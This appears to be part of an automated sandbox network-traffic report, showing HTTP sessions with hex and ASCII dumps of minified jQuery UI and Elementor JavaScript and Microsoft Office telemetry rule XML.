                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 66 6f 72 6d 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 5f 66 6f 72 6d 28 29 2c 74 68 69 73 2e 66 6f 72 6d 2e 6c 65 6e 67 74 68 26 26 28 28 74 3d 74 68 69 73 2e 66 6f 72 6d 2e 64 61 74 61 28 22 75 69 2d 66 6f 72 6d 2d 72 65 73 65 74 2d 69 6e 73 74 61 6e 63 65 73 22 29 7c 7c 5b 5d 29 2e 6c 65 6e 67 74 68 7c 7c 74 68 69 73 2e 66 6f 72 6d 2e 6f 6e 28 22 72 65 73 65 74 2e 75 69 2d 66 6f 72 6d 2d 72 65 73 65 74 22 2c 74 68 69 73 2e 5f 66 6f 72 6d 52 65 73 65 74 48 61 6e 64 6c 65 72 29 2c 74 2e 70 75 73 68 28 74 68 69 73 29 2c 74 68 69 73 2e 66 6f 72 6d 2e 64 61 74 61 28 22 75 69 2d 66 6f 72 6d 2d 72 65 73 65 74 2d 69 6e 73 74 61 6e 63 65 73 22 2c 74 29 29 7d 2c 5f 75 6e 62 69 6e 64 46 6f 72 6d 52 65 73 65 74 48 61 6e 64 6c 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                                                                                              Data Ascii: form=this.element._form(),this.form.length&&((t=this.form.data("ui-form-reset-instances")||[]).length||this.form.on("reset.ui-form-reset",this._formResetHandler),t.push(this),this.form.data("ui-form-reset-instances",t))},_unbindFormResetHandler:function()
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 78 2e 75 69 2e 6b 65 79 43 6f 64 65 3d 7b 42 41 43 4b 53 50 41 43 45 3a 38 2c 43 4f 4d 4d 41 3a 31 38 38 2c 44 45 4c 45 54 45 3a 34 36 2c 44 4f 57 4e 3a 34 30 2c 45 4e 44 3a 33 35 2c 45 4e 54 45 52 3a 31 33 2c 45 53 43 41 50 45 3a 32 37 2c 48 4f 4d 45 3a 33 36 2c 4c 45 46 54 3a 33 37 2c 50 41 47 45 5f 44 4f 57 4e 3a 33 34 2c 50 41 47 45 5f 55 50 3a 33 33 2c 50 45 52 49 4f 44 3a 31 39 30 2c 52 49 47 48 54 3a 33 39 2c 53 50 41 43 45 3a 33 32 2c 54 41 42 3a 39 2c 55 50 3a 33 38 7d 2c 0a 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 4c 61 62 65 6c 73 20 31 2e 31 33 2e 33
                                                                                                                                                                                                                              Data Ascii: ased under the MIT license. * https://jquery.org/license */x.ui.keyCode={BACKSPACE:8,COMMA:188,DELETE:46,DOWN:40,END:35,ENTER:13,ESCAPE:27,HOME:36,LEFT:37,PAGE_DOWN:34,PAGE_UP:33,PERIOD:190,RIGHT:39,SPACE:32,TAB:9,UP:38},/*! * jQuery UI Labels 1.13.3
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 72 3d 2f 5b 5c 2b 5c 2d 5d 5c 64 2b 28 5c 2e 5b 5c 64 5d 2b 29 3f 25 3f 2f 2c 6c 3d 2f 5e 5c 77 2b 2f 2c 61 3d 2f 25 24 2f 2c 68 3d 78 2e 66 6e 2e 70 6f 73 69 74 69 6f 6e 2c 78 2e 70 6f 73 69 74 69 6f 6e 3d 7b 73 63 72 6f 6c 6c 62 61 72 57 69 64 74 68 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 65 2c 69 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 3a 28 69 3d 28 65 3d 78 28 22 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 32 30 30 70 78 3b 68 65 69 67 68 74 3a 32 30 30 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 27 3e 3c 64 69 76 20 73 74 79 6c 65 3d 27 68 65 69 67 68 74 3a 33 30 30 70 78 3b 77 69 64 74 68 3a 61 75
                                                                                                                                                                                                                              Data Ascii: r=/[\+\-]\d+(\.[\d]+)?%?/,l=/^\w+/,a=/%$/,h=x.fn.position,x.position={scrollbarWidth:function(){var t,e,i;return void 0!==n?n:(i=(e=x("<div style='display:block;position:absolute;width:200px;height:200px;overflow:hidden;'><div style='height:300px;width:au
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 29 3f 7b 77 69 64 74 68 3a 74 2e 77 69 64 74 68 28 29 2c 68 65 69 67 68 74 3a 74 2e 68 65 69 67 68 74 28 29 2c 6f 66 66 73 65 74 3a 7b 74 6f 70 3a 74 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 2c 6c 65 66 74 3a 74 2e 73 63 72 6f 6c 6c 4c 65 66 74 28 29 7d 7d 3a 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 3f 7b 77 69 64 74 68 3a 30 2c 68 65 69 67 68 74 3a 30 2c 6f 66 66 73 65 74 3a 7b 74 6f 70 3a 65 2e 70 61 67 65 59 2c 6c 65 66 74 3a 65 2e 70 61 67 65 58 7d 7d 3a 7b 77 69 64 74 68 3a 74 2e 6f 75 74 65 72 57 69 64 74 68 28 29 2c 68 65 69 67 68 74 3a 74 2e 6f 75 74 65 72 48 65 69 67 68 74 28 29 2c 6f 66 66 73 65 74 3a 74 2e 6f 66 66 73 65 74 28 29 7d 2c 76 5b 30 5d 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 26 26 28 66 2e 61 74 3d 22 6c 65 66 74 20 74 6f 70
                                                                                                                                                                                                                              Data Ascii: )?{width:t.width(),height:t.height(),offset:{top:t.scrollTop(),left:t.scrollLeft()}}:e.preventDefault?{width:0,height:0,offset:{top:e.pageY,left:e.pageX}}:{width:t.outerWidth(),height:t.outerHeight(),offset:t.offset()},v[0].preventDefault&&(f.at="left top
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 65 6c 65 6d 57 69 64 74 68 3a 6c 2c 65 6c 65 6d 48 65 69 67 68 74 3a 61 2c 63 6f 6c 6c 69 73 69 6f 6e 50 6f 73 69 74 69 6f 6e 3a 69 2c 63 6f 6c 6c 69 73 69 6f 6e 57 69 64 74 68 3a 6f 2c 63 6f 6c 6c 69 73 69 6f 6e 48 65 69 67 68 74 3a 73 2c 6f 66 66 73 65 74 3a 5b 63 5b 30 5d 2b 75 5b 30 5d 2c 63 5b 31 5d 2b 75 5b 31 5d 5d 2c 6d 79 3a 66 2e 6d 79 2c 61 74 3a 66 2e 61 74 2c 77 69 74 68 69 6e 3a 79 2c 65 6c 65 6d 3a 72 7d 29 7d 29 2c 66 2e 75 73 69 6e 67 26 26 28 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 67 2e 6c 65 66 74 2d 68 2e 6c 65 66 74 2c 69 3d 65 2b 64 2d 6c 2c 6e 3d 67 2e 74 6f 70 2d 68 2e 74 6f 70 2c 6f 3d 6e 2b 70 2d 61 2c 73 3d 7b 74 61 72 67 65 74 3a 7b 65 6c 65 6d 65 6e 74 3a 76 2c 6c 65 66 74 3a 67 2e 6c 65 66 74 2c 74 6f 70
                                                                                                                                                                                                                              Data Ascii: elemWidth:l,elemHeight:a,collisionPosition:i,collisionWidth:o,collisionHeight:s,offset:[c[0]+u[0],c[1]+u[1]],my:f.my,at:f.at,within:y,elem:r})}),f.using&&(t=function(t){var e=g.left-h.left,i=e+d-l,n=g.top-h.top,o=n+p-a,s={target:{element:v,left:g.left,top
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 74 2c 65 29 7b 76 61 72 20 69 3d 65 2e 77 69 74 68 69 6e 2c 6e 3d 69 2e 6f 66 66 73 65 74 2e 6c 65 66 74 2b 69 2e 73 63 72 6f 6c 6c 4c 65 66 74 2c 6f 3d 69 2e 77 69 64 74 68 2c 69 3d 69 2e 69 73 57 69 6e 64 6f 77 3f 69 2e 73 63 72 6f 6c 6c 4c 65 66 74 3a 69 2e 6f 66 66 73 65 74 2e 6c 65 66 74 2c 73 3d 74 2e 6c 65 66 74 2d 65 2e 63 6f 6c 6c 69 73 69 6f 6e 50 6f 73 69 74 69 6f 6e 2e 6d 61 72 67 69 6e 4c 65 66 74 2c 72 3d 73 2d 69 2c 73 3d 73 2b 65 2e 63 6f 6c 6c 69 73 69 6f 6e 57 69 64 74 68 2d 6f 2d 69 2c 6c 3d 22 6c 65 66 74 22 3d 3d 3d 65 2e 6d 79 5b 30 5d 3f 2d 65 2e 65 6c 65 6d 57 69 64 74 68 3a 22 72 69 67 68 74 22 3d 3d 3d 65 2e 6d 79 5b 30 5d 3f 65 2e 65 6c 65 6d 57 69 64 74 68 3a 30 2c 61 3d 22 6c 65 66 74 22 3d 3d 3d 65 2e 61 74 5b 30 5d 3f 65 2e
                                                                                                                                                                                                                              Data Ascii: t,e){var i=e.within,n=i.offset.left+i.scrollLeft,o=i.width,i=i.isWindow?i.scrollLeft:i.offset.left,s=t.left-e.collisionPosition.marginLeft,r=s-i,s=s+e.collisionWidth-o-i,l="left"===e.my[0]?-e.elemWidth:"right"===e.my[0]?e.elemWidth:0,a="left"===e.at[0]?e.
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 26 26 78 28 74 29 2e 74 72 69 67 67 65 72 28 22 62 6c 75 72 22 29 7d 2c 0a 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 53 63 72 6f 6c 6c 20 50 61 72 65 6e 74 20 31 2e 31 33 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 78 2e 66 6e 2e 73 63 72 6f 6c 6c 50 61 72 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 63
                                                                                                                                                                                                                              Data Ascii: &&x(t).trigger("blur")},/*! * jQuery UI Scroll Parent 1.13.3 * https://jqueryui.com * * Copyright OpenJS Foundation and other contributors * Released under the MIT license. * https://jquery.org/license */x.fn.scrollParent=function(t){var e=this.c


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              109192.168.2.64984213.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:11 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 477
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                                              x-ms-request-id: 95048cb8-e01e-0051-2a5a-2384b2000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180411Z-17fbfdc98bbgpkh7048gc3vfcc0000000680000000005dy9
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              110192.168.2.64984313.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:11 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                                              x-ms-request-id: 4edb1b06-d01e-00a1-56e1-2035b1000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180411Z-r1755647c66wjht63r8k9qqnrs000000071g0000000070nc
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              111192.168.2.64984413.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:11 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                                              x-ms-request-id: 1c3f4cdf-f01e-0096-775d-2310ef000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180411Z-17fbfdc98bbrx2rj4asdpg8sbs0000000240000000003cry
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              112192.168.2.649845141.193.213.114431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC590OUTGET /wp-content/plugins/elementor/assets/js/webpack.runtime.min.js HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _ga=GA1.2.2026524419.1729706650; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:11 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Tue, 15 Oct 2024 16:58:20 GMT
                                                                                                                                                                                                                              ETag: W/"670e9f2c-1385"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614822
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5ea5bf14689-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC877INData Raw: 31 33 38 35 0d 0a 2f 2a 21 20 65 6c 65 6d 65 6e 74 6f 72 20 2d 20 76 33 2e 32 34 2e 30 20 2d 20 30 39 2d 31 30 2d 32 30 32 34 20 2a 2f 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 2c 72 2c 5f 2c 74 2c 61 2c 69 3d 7b 7d 2c 6e 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 28 65 29 7b 76 61 72 20 72 3d 6e 5b 65 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 72 29 72 65 74 75 72 6e 20 72 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 5f 3d 6e 5b 65 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 69 5b 65 5d 2e 63 61 6c 6c 28 5f 2e 65 78 70 6f 72 74 73 2c 5f 2c 5f 2e 65 78 70 6f 72 74 73 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 2c 5f 2e 65 78 70 6f 72 74
                                                                                                                                                                                                                              Data Ascii: 1385/*! elementor - v3.24.0 - 09-10-2024 */(()=>{"use strict";var e,r,_,t,a,i={},n={};function __webpack_require__(e){var r=n[e];if(void 0!==r)return r.exports;var _=n[e]={exports:{}};return i[e].call(_.exports,_,_.exports,__webpack_require__),_.export
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 74 79 70 65 6f 66 20 65 2e 74 68 65 6e 29 72 65 74 75 72 6e 20 65 7d 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 3b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 72 28 61 29 3b 76 61 72 20 69 3d 7b 7d 3b 72 3d 72 7c 7c 5b 6e 75 6c 6c 2c 5f 28 7b 7d 29 2c 5f 28 5b 5d 29 2c 5f 28 5f 29 5d 3b 66 6f 72 28 76 61 72 20 6e 3d 32 26 74 26 26 65 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6e 26 26 21 7e 72 2e 69 6e 64 65 78 4f 66 28 6e 29 3b 6e 3d 5f 28 6e 29 29 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 4e 61 6d 65 73 28 6e 29 2e 66 6f 72 45 61 63 68 28 28 72 3d 3e 69 5b 72 5d 3d 28 29 3d 3e 65 5b 72 5d 29 29 3b 72 65 74 75 72 6e 20 69 2e 64 65 66 61 75 6c 74 3d 28 29 3d 3e 65 2c 5f 5f 77
                                                                                                                                                                                                                              Data Ascii: typeof e.then)return e}var a=Object.create(null);__webpack_require__.r(a);var i={};r=r||[null,_({}),_([]),_(_)];for(var n=2&t&&e;"object"==typeof n&&!~r.indexOf(n);n=_(n))Object.getOwnPropertyNames(n).forEach((r=>i[r]=()=>e[r]));return i.default=()=>e,__w
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 29 72 65 74 75 72 6e 20 67 6c 6f 62 61 6c 54 68 69 73 3b 74 72 79 7b 72 65 74 75 72 6e 20 74 68 69 73 7c 7c 6e 65 77 20 46 75 6e 63 74 69 6f 6e 28 22 72 65 74 75 72 6e 20 74 68 69 73 22 29 28 29 7d 63 61 74 63 68 28 65 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 29 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 7d 7d 28 29 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6f 3d 28 65 2c 72 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 72 29 2c 74 3d 7b 7d 2c 61 3d 22 65 6c 65 6d 65 6e 74 6f 72 3a 22 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6c 3d 28 65 2c 72 2c 5f 2c 69
                                                                                                                                                                                                                              Data Ascii: eof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window)return window}}(),__webpack_require__.o=(e,r)=>Object.prototype.hasOwnProperty.call(e,r),t={},a="elementor:",__webpack_require__.l=(e,r,_,i
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 72 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 26 26 28 65 3d 72 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 73 72 63 29 2c 21 65 29 29 7b 76 61 72 20 5f 3d 72 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 3b 69 66 28 5f 2e 6c 65 6e 67 74 68 29 66 6f 72 28 76 61 72 20 74 3d 5f 2e 6c 65 6e 67 74 68 2d 31 3b 74 3e 2d 31 26 26 21 65 3b 29 65 3d 5f 5b 74 2d 2d 5d 2e 73 72 63 7d 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 75 74 6f 6d 61 74 69 63 20 70 75 62 6c 69 63 50 61 74 68 20 69 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 20 69 6e 20 74 68 69 73 20 62 72 6f 77 73 65 72 22 29 3b 65 3d 65 2e 72 65 70 6c 61 63 65 28 2f 23 2e 2a 24 2f 2c 22 22 29 2e 72 65 70 6c 61 63 65 28 2f 5c 3f 2e
                                                                                                                                                                                                                              Data Ascii: r.currentScript&&(e=r.currentScript.src),!e)){var _=r.getElementsByTagName("script");if(_.length)for(var t=_.length-1;t>-1&&!e;)e=_[t--].src}if(!e)throw new Error("Automatic publicPath is not supported in this browser");e=e.replace(/#.*$/,"").replace(/\?.
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC21INData Raw: 68 2e 62 69 6e 64 28 72 29 29 7d 29 28 29 7d 29 28 29 3b 0d 0a
                                                                                                                                                                                                                              Data Ascii: h.bind(r))})()})();
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
